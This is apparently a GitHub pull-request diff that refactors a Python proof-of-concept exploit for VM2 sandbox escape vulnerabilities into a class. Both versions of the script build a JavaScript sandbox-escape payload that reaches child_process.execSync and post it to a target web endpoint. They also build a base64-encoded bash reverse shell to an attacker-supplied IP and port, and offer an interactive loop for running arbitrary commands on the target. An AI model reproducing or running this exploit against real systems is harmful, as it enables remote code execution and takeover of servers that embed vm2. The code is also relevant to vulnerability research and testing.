Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
331 changes: 177 additions & 154 deletions exploit.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,21 +2,35 @@
import requests
import sys
import base64
import json
from requests_toolbelt.utils import dump
import cmd
import readline
import json

# PoC Exploit for VM2 Sandbox Escape Vulnerabilities (All Versions)
# Author : Ravindu Wickramasinghe | rvz
# Credits : Xion (SeungHyun Lee) of "KAIST Hacking Lab" for disclosing these vulnerabilities and providing detailed analysis.

custom = False
temp = []
data = payload = curl = enc_type = param = ip = port = None

def extract_data(request_data):
#print("\033[32m[>]\033[0m curl : ", request_data)
# VM2 Sandbox Escape Proof of Concept
# Author : Taylor Christian Newsome | ClumsyLulz
# Credits : Xion (SeungHyun Lee) of "KAIST Hacking Lab" And Ravindu Wickramasinghe | rvz

class VM2Exploit:
def __init__(self):
self.verbose = True
self.custom = False
self.param = None
self.enc_type = None
self.ip = None
self.port = None
self.data = None
self.temp = []
self.payload = None
self.url = None
self.headers = None
self.params = {}
self.curl = False

def extract_data(self, request_data):
"""
Extract URL, parameters, and headers from a curl command.
"""
url_pattern = re.compile(r"curl '([^']+)'")
urlm = url_pattern.search(request_data)
url = urlm.group(1) if urlm else None
Expand All @@ -29,147 +43,156 @@ def extract_data(request_data):
headers = {key: value for key, value in headers_matches}
return url, params, headers


def send(url,headers,params,payload):
pdata = encode_payload(vm2payload)

if not custom:
params[list(params.keys())[0]] = pdata
else:
params[param] = pdata

# if provinding a url these headers will be used! update if necessary
# -------------------------------------------------------------------
if headers==None:
headers = {
'Content-Type': 'application/json'
}
# -------------------------------------------------------------------

for key, value in params.items():
temp.append("\"" + key + "\":\"" + value + "\"")
params = "{" + ",".join(temp) + "}"

if verbose:
print("\033[31m[!]\033[0m if this is not the parameter you want to select add --param=your_param")
print(f"\033[32m[>]\033[0m selected parameter: {param}")
#print("\033[32m[>]\033[0m payload: ",pdata)
#print("\033[32m[>]\033[0m request's data: ",params)

response = requests.post(url, data=params, headers=headers)
data = dump.dump_all(response)
if verbose:
print(data.decode('utf-8'))
try:
values = list(json.loads(response.text).values())
print(values[0])
except json.JSONDecodeError:
print(response.text)


def vm2_payload_gen(cmd):
payload = '''
const {VM} = require("vm2");
const vm = new VM();

const code = `
cmd = "'''+cmd+'''"
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync(cmd); }
)
}
}
};
p.then();
`;

console.log(vm.run(code));'''
if verbose:
print("\033[32m[>]\033[0m vm2-payload: \n","-"* 20,payload,"\n","-"* 20)
return payload



def encode_payload(vm2payload):
if enc_type:
if verbose:
#print(f"\033[32m[>]\033[0m payload encoding: {enc_type}")
pass
pdata = vm2payload.encode('utf-8').hex() if enc_type == 'hex' else base64.b64encode(vm2payload.encode('utf-8')).decode('utf-8')
else:
pdata=vm2payload
return pdata


try:
request_data = sys.argv[1]
for arg in sys.argv[1:]:
if arg == '--hex': enc_type = 'hex'
if arg.startswith('--param='): param = arg.split("=")[1]
elif arg == '--base64': enc_type = 'base64'
elif arg.startswith('--ip='): ip = arg.split("=")[1]
elif arg.startswith('--port='): port = arg.split("=")[1]

except:
print("./usage <curl-request-or-target-url>")
exit()

if request_data.startswith("curl"):
url, params, headers = extract_data(request_data)
print("\033[32m[>]\033[0m target url: ", url)
print("\033[32m[>]\033[0m params: ",params)
try:
print("\033[32m[>]\033[0m extracted parameter: ", list(params.keys())[0])
except:
pass
curl = True

elif request_data.startswith("http"):
url = request_data
params = {}
headers = None
print("\033[32m[>]\033[0m target url:", url)
curl = False
else:
print("./usage <curl-request-or-target-url>")
exit()

if param==None or custom==True:
try:
param=list(params.keys())[0]
except:
print("\033[31m[!]\033[0m since you're providing a url you've to specifiy the parameter use --param")
exit()
else:
params={param:""}
verbose = True

if ip != None and port != None:
payload = f"bash -i >& /dev/tcp/{ip}/{port} 0>&1"
payload = "echo " + base64.b64encode(payload.encode('utf-8')).decode('utf-8') + " | base64 -d | bash"
print("\033[32m[>]\033[0m payload : ",payload)
vm2payload = vm2_payload_gen(payload)
send(url,headers,params,payload)
else:
while True:
verbose = False
user_input = input(" > ")
if user_input.lower() == 'exit':
break
def encode_payload(self, vm2payload):
"""
Encode the payload based on the encoding type (base64/hex).
"""
if self.enc_type:
if self.verbose:
pass
pdata = vm2payload.encode('utf-8').hex() if self.enc_type == 'hex' else base64.b64encode(vm2payload.encode('utf-8')).decode('utf-8')
else:
pdata = vm2payload
return pdata

def vm2_payload_gen(self, cmd):
"""
Generate the VM2 sandbox escape payload.
"""
payload = f'''
const {{VM}} = require("vm2");
const vm = new VM();

const code = `
cmd = "{cmd}"
async function fn() {{
(function stack() {{
new Error().stack;
stack();
}})();
}}
p = fn();
p.constructor = {{
[Symbol.species]: class FakePromise {{
constructor(executor) {{
executor(
(x) => x,
(err) => {{ return err.constructor.constructor('return process')().mainModule.require('child_process').execSync(cmd); }}
)
}}
}}
}};
p.then();
`;

console.log(vm.run(code));
'''
if self.verbose:
print(f"\033[32m[>]\033[0m vm2-payload: \n{'-' * 20}\n{payload}\n{'-' * 20}")
return payload

def send(self, url, headers, params, payload):
"""
Send the request with the payload and parameters to the target URL.
"""
pdata = self.encode_payload(self.vm2_payload_gen(payload))

if not self.custom:
params[list(params.keys())[0]] = pdata
else:
params[self.param] = pdata

if headers is None:
headers = {'Content-Type': 'application/json'}

for key, value in params.items():
self.temp.append(f'"{key}":"{value}"')
params = "{" + ",".join(self.temp) + "}"

if self.verbose:
print("\033[31m[!]\033[0m if this is not the parameter you want to select add --param=your_param")
print(f"\033[32m[>]\033[0m selected parameter: {self.param}")

response = requests.post(url, data=params, headers=headers)
data = dump.dump_all(response)
if self.verbose:
print(data.decode('utf-8'))
try:
values = list(json.loads(response.text).values())
print(values[0])
except json.JSONDecodeError:
print(response.text)

def handle_custom_payload(self, payload):
"""
Handle the custom payload creation and execution based on user input.
"""
if self.ip and self.port:
payload = f"bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1"
payload = f"echo {base64.b64encode(payload.encode('utf-8')).decode('utf-8')} | base64 -d | bash"
print(f"\033[32m[>]\033[0m payload : {payload}")
self.send(self.url, self.headers, self.params, payload)
else:
while True:
self.verbose = False
user_input = input(" > ")
if user_input.lower() == 'exit':
break
try:
payload = user_input
self.send(self.url, self.headers, self.params, payload)
except Exception as e:
print(f"\033[31m[!]\033[0m error : {e}")

def parse_arguments(self):
"""
Parse command-line arguments to configure the exploit.
"""
try:
payload = user_input
vm2payload = vm2_payload_gen(payload)
send(url,headers,params,payload)
except Exception as e:
print(f"\033[31m[!]\033[0m error : {e}")
request_data = sys.argv[1]
for arg in sys.argv[1:]:
if arg == '--hex': self.enc_type = 'hex'
if arg.startswith('--param='): self.param = arg.split("=")[1]
elif arg == '--base64': self.enc_type = 'base64'
elif arg.startswith('--ip='): self.ip = arg.split("=")[1]
elif arg.startswith('--port='): self.port = arg.split("=")[1]
except Exception:
print("./usage <curl-request-or-target-url>")
exit()

if request_data.startswith("curl"):
self.url, self.params, self.headers = self.extract_data(request_data)
print(f"\033[32m[>]\033[0m target url: {self.url}")
print(f"\033[32m[>]\033[0m params: {self.params}")
self.curl = True

elif request_data.startswith("http"):
self.url = request_data
self.params = {}
self.headers = None
print(f"\033[32m[>]\033[0m target url: {self.url}")
self.curl = False
else:
print("./usage <curl-request-or-target-url>")
exit()

if not self.param or self.custom:
try:
self.param = list(self.params.keys())[0]
except Exception:
print("\033[31m[!]\033[0m since you're providing a url you've to specify the parameter use --param")
exit()
else:
self.params = {self.param: ""}

def execute(self):
"""
Execute the exploit based on the provided parameters.
"""
self.parse_arguments()
self.handle_custom_payload(self.payload)


if __name__ == "__main__":
exploit = VM2Exploit()
exploit.execute()